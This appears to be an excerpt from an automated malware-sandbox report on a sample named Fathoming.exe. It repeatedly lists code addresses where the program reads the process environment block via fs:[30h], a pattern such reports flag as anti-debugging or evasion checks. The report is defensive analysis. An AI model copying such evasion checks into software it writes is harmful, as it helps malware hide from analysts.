      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE47FB mov eax, dword ptr fs:[00000030h]8_2_21AE47FB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6E7E1 mov eax, dword ptr fs:[00000030h]8_2_21B6E7E1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B027ED mov eax, dword ptr fs:[00000030h]8_2_21B027ED
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B027ED mov eax, dword ptr fs:[00000030h]8_2_21B027ED
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B027ED mov eax, dword ptr fs:[00000030h]8_2_21B027ED
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEC7C0 mov eax, dword ptr fs:[00000030h]8_2_21AEC7C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B607C3 mov eax, dword ptr fs:[00000030h]8_2_21B607C3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5C730 mov eax, dword ptr fs:[00000030h]8_2_21B5C730
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1273C mov eax, dword ptr fs:[00000030h]8_2_21B1273C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1273C mov ecx, dword ptr fs:[00000030h]8_2_21B1273C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1273C mov eax, dword ptr fs:[00000030h]8_2_21B1273C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C720 mov eax, dword ptr fs:[00000030h]8_2_21B1C720
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C720 mov eax, dword ptr fs:[00000030h]8_2_21B1C720
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B10710 mov eax, dword ptr fs:[00000030h]8_2_21B10710
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C700 mov eax, dword ptr fs:[00000030h]8_2_21B1C700
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE0710 mov eax, dword ptr fs:[00000030h]8_2_21AE0710
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8770 mov eax, dword ptr fs:[00000030h]8_2_21AE8770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0770 mov eax, dword ptr fs:[00000030h]8_2_21AF0770
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22750 mov eax, dword ptr fs:[00000030h]8_2_21B22750
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22750 mov eax, dword ptr fs:[00000030h]8_2_21B22750
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B64755 mov eax, dword ptr fs:[00000030h]8_2_21B64755
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6E75D mov eax, dword ptr fs:[00000030h]8_2_21B6E75D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1674D mov esi, dword ptr fs:[00000030h]8_2_21B1674D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1674D mov eax, dword ptr fs:[00000030h]8_2_21B1674D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1674D mov eax, dword ptr fs:[00000030h]8_2_21B1674D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE0750 mov eax, dword ptr fs:[00000030h]8_2_21AE0750
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B166B0 mov eax, dword ptr fs:[00000030h]8_2_21B166B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C6A6 mov eax, dword ptr fs:[00000030h]8_2_21B1C6A6
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4690 mov eax, dword ptr fs:[00000030h]8_2_21AE4690
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4690 mov eax, dword ptr fs:[00000030h]8_2_21AE4690
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E6F2 mov eax, dword ptr fs:[00000030h]8_2_21B5E6F2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E6F2 mov eax, dword ptr fs:[00000030h]8_2_21B5E6F2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E6F2 mov eax, dword ptr fs:[00000030h]8_2_21B5E6F2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E6F2 mov eax, dword ptr fs:[00000030h]8_2_21B5E6F2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B606F1 mov eax, dword ptr fs:[00000030h]8_2_21B606F1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B606F1 mov eax, dword ptr fs:[00000030h]8_2_21B606F1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A6C7 mov ebx, dword ptr fs:[00000030h]8_2_21B1A6C7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A6C7 mov eax, dword ptr fs:[00000030h]8_2_21B1A6C7
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE262C mov eax, dword ptr fs:[00000030h]8_2_21AE262C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFE627 mov eax, dword ptr fs:[00000030h]8_2_21AFE627
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B16620 mov eax, dword ptr fs:[00000030h]8_2_21B16620
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B18620 mov eax, dword ptr fs:[00000030h]8_2_21B18620
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF260B mov eax, dword ptr fs:[00000030h]8_2_21AF260B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B22619 mov eax, dword ptr fs:[00000030h]8_2_21B22619
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E609 mov eax, dword ptr fs:[00000030h]8_2_21B5E609
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B12674 mov eax, dword ptr fs:[00000030h]8_2_21B12674
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A660 mov eax, dword ptr fs:[00000030h]8_2_21B1A660
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A660 mov eax, dword ptr fs:[00000030h]8_2_21B1A660
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA866E mov eax, dword ptr fs:[00000030h]8_2_21BA866E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA866E mov eax, dword ptr fs:[00000030h]8_2_21BA866E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFC640 mov eax, dword ptr fs:[00000030h]8_2_21AFC640
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE09AD mov eax, dword ptr fs:[00000030h]8_2_21AE09AD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE09AD mov eax, dword ptr fs:[00000030h]8_2_21AE09AD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B689B3 mov esi, dword ptr fs:[00000030h]8_2_21B689B3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B689B3 mov eax, dword ptr fs:[00000030h]8_2_21B689B3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B689B3 mov eax, dword ptr fs:[00000030h]8_2_21B689B3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF29A0 mov eax, dword ptr fs:[00000030h]8_2_21AF29A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B129F9 mov eax, dword ptr fs:[00000030h]8_2_21B129F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B129F9 mov eax, dword ptr fs:[00000030h]8_2_21B129F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6E9E0 mov eax, dword ptr fs:[00000030h]8_2_21B6E9E0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B149D0 mov eax, dword ptr fs:[00000030h]8_2_21B149D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAA9D3 mov eax, dword ptr fs:[00000030h]8_2_21BAA9D3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B769C0 mov eax, dword ptr fs:[00000030h]8_2_21B769C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEA9D0 mov eax, dword ptr fs:[00000030h]8_2_21AEA9D0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6892A mov eax, dword ptr fs:[00000030h]8_2_21B6892A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B7892B mov eax, dword ptr fs:[00000030h]8_2_21B7892B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6C912 mov eax, dword ptr fs:[00000030h]8_2_21B6C912
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD8918 mov eax, dword ptr fs:[00000030h]8_2_21AD8918
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD8918 mov eax, dword ptr fs:[00000030h]8_2_21AD8918
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E908 mov eax, dword ptr fs:[00000030h]8_2_21B5E908
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5E908 mov eax, dword ptr fs:[00000030h]8_2_21B5E908
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B84978 mov eax, dword ptr fs:[00000030h]8_2_21B84978
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B84978 mov eax, dword ptr fs:[00000030h]8_2_21B84978
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6C97C mov eax, dword ptr fs:[00000030h]8_2_21B6C97C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B06962 mov eax, dword ptr fs:[00000030h]8_2_21B06962
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B06962 mov eax, dword ptr fs:[00000030h]8_2_21B06962
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B06962 mov eax, dword ptr fs:[00000030h]8_2_21B06962
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B2096E mov eax, dword ptr fs:[00000030h]8_2_21B2096E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B2096E mov edx, dword ptr fs:[00000030h]8_2_21B2096E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B2096E mov eax, dword ptr fs:[00000030h]8_2_21B2096E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B60946 mov eax, dword ptr fs:[00000030h]8_2_21B60946
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4940 mov eax, dword ptr fs:[00000030h]8_2_21BB4940
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE0887 mov eax, dword ptr fs:[00000030h]8_2_21AE0887
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6C89D mov eax, dword ptr fs:[00000030h]8_2_21B6C89D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C8F9 mov eax, dword ptr fs:[00000030h]8_2_21B1C8F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1C8F9 mov eax, dword ptr fs:[00000030h]8_2_21B1C8F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAA8E4 mov eax, dword ptr fs:[00000030h]8_2_21BAA8E4
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0E8C0 mov eax, dword ptr fs:[00000030h]8_2_21B0E8C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB08C0 mov eax, dword ptr fs:[00000030h]8_2_21BB08C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1A830 mov eax, dword ptr fs:[00000030h]8_2_21B1A830
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8483A mov eax, dword ptr fs:[00000030h]8_2_21B8483A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8483A mov eax, dword ptr fs:[00000030h]8_2_21B8483A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B02835 mov eax, dword ptr fs:[00000030h]8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B02835 mov eax, dword ptr fs:[00000030h]8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B02835 mov eax, dword ptr fs:[00000030h]8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B02835 mov ecx, dword ptr fs:[00000030h]8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B02835 mov eax, dword ptr fs:[00000030h]8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B02835 mov eax, dword ptr fs:[00000030h]8_2_21B02835
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6C810 mov eax, dword ptr fs:[00000030h]8_2_21B6C810
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6E872 mov eax, dword ptr fs:[00000030h]8_2_21B6E872
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6E872 mov eax, dword ptr fs:[00000030h]8_2_21B6E872
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B76870 mov eax, dword ptr fs:[00000030h]8_2_21B76870
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B76870 mov eax, dword ptr fs:[00000030h]8_2_21B76870
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B10854 mov eax, dword ptr fs:[00000030h]8_2_21B10854
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF2840 mov ecx, dword ptr fs:[00000030h]8_2_21AF2840
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4859 mov eax, dword ptr fs:[00000030h]8_2_21AE4859
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE4859 mov eax, dword ptr fs:[00000030h]8_2_21AE4859
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B94BB0 mov eax, dword ptr fs:[00000030h]8_2_21B94BB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B94BB0 mov eax, dword ptr fs:[00000030h]8_2_21B94BB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0BBE mov eax, dword ptr fs:[00000030h]8_2_21AF0BBE
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0BBE mov eax, dword ptr fs:[00000030h]8_2_21AF0BBE
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6CBF0 mov eax, dword ptr fs:[00000030h]8_2_21B6CBF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0EBFC mov eax, dword ptr fs:[00000030h]8_2_21B0EBFC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8BF0 mov eax, dword ptr fs:[00000030h]8_2_21AE8BF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8BF0 mov eax, dword ptr fs:[00000030h]8_2_21AE8BF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8BF0 mov eax, dword ptr fs:[00000030h]8_2_21AE8BF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE0BCD mov eax, dword ptr fs:[00000030h]8_2_21AE0BCD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE0BCD mov eax, dword ptr fs:[00000030h]8_2_21AE0BCD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE0BCD mov eax, dword ptr fs:[00000030h]8_2_21AE0BCD
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8EBD0 mov eax, dword ptr fs:[00000030h]8_2_21B8EBD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B00BCB mov eax, dword ptr fs:[00000030h]8_2_21B00BCB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B00BCB mov eax, dword ptr fs:[00000030h]8_2_21B00BCB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B00BCB mov eax, dword ptr fs:[00000030h]8_2_21B00BCB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0EB20 mov eax, dword ptr fs:[00000030h]8_2_21B0EB20
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0EB20 mov eax, dword ptr fs:[00000030h]8_2_21B0EB20
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA8B28 mov eax, dword ptr fs:[00000030h]8_2_21BA8B28
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA8B28 mov eax, dword ptr fs:[00000030h]8_2_21BA8B28
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h]8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h]8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h]8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h]8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h]8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h]8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h]8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h]8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5EB1D mov eax, dword ptr fs:[00000030h]8_2_21B5EB1D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4B00 mov eax, dword ptr fs:[00000030h]8_2_21BB4B00
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADCB7E mov eax, dword ptr fs:[00000030h]8_2_21ADCB7E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8EB50 mov eax, dword ptr fs:[00000030h]8_2_21B8EB50
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB2B57 mov eax, dword ptr fs:[00000030h]8_2_21BB2B57
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB2B57 mov eax, dword ptr fs:[00000030h]8_2_21BB2B57
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB2B57 mov eax, dword ptr fs:[00000030h]8_2_21BB2B57
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB2B57 mov eax, dword ptr fs:[00000030h]8_2_21BB2B57
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B94B4B mov eax, dword ptr fs:[00000030h]8_2_21B94B4B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B94B4B mov eax, dword ptr fs:[00000030h]8_2_21B94B4B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B76B40 mov eax, dword ptr fs:[00000030h]8_2_21B76B40
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B76B40 mov eax, dword ptr fs:[00000030h]8_2_21B76B40
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAAB40 mov eax, dword ptr fs:[00000030h]8_2_21BAAB40
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B88B42 mov eax, dword ptr fs:[00000030h]8_2_21B88B42
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AD8B50 mov eax, dword ptr fs:[00000030h]8_2_21AD8B50
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8AA0 mov eax, dword ptr fs:[00000030h]8_2_21AE8AA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE8AA0 mov eax, dword ptr fs:[00000030h]8_2_21AE8AA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B36AA4 mov eax, dword ptr fs:[00000030h]8_2_21B36AA4
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B18A90 mov edx, dword ptr fs:[00000030h]8_2_21B18A90
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h]8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h]8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h]8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h]8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h]8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h]8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h]8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h]8_2_21AEEA80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AEEA80 mov eax, dword ptr fs:[00000030h]8_2_21AEEA80
